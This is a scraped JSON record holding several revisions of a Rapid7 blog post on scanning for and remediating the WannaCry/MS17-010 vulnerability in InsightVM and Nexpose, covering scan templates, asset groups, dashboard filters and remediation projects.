src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! 
If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" 
width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. 
</span></p></div><!-- [DocumentBodyEnd:040bdfaf-c803-4908-9a24-8e9090b7e64f] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-18T16:33:44", "lastseen": "2017-05-18T16:49:32"}, "differentElements": ["description"], "edition": 2}, {"lastseen": "2017-06-07T15:18:07", "bulletin": {"published": "2017-06-07T14:57:05", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 37, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:f234a140-3a4d-465a-bf33-b296a18e2137] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. 
Also removed steps 5 and 6 from the scan instructions, as they were not strictly necessary and were causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access, an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 6/7/17: Fixed a small error in the dynamic asset group/dashboard section. We also now have pre-built WannaCry dashboards in InsightVM***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating, we want to keep this simple. 
First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a 
href=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\"><img class=\"jive-image\" height=\"260\" src=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\" style=\"height: 280px; width: 815px;\" width=\"758\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! 
If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR <span style=\"color: #000000; font-family: Calibri; font-size: 16px; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0146\"</span>asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting</a></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. 
If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:f234a140-3a4d-465a-bf33-b296a18e2137] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-06-07T14:57:05", "lastseen": "2017-06-07T15:18:07"}, "differentElements": ["description"], "edition": 7}, {"lastseen": "2017-05-20T04:49:54", "bulletin": {"published": "2017-05-18T16:33:44", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 16, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- 
[DocumentBodyStart:2d29ad65-32b0-457f-8346-e45e3999e711] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. 
</strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. 
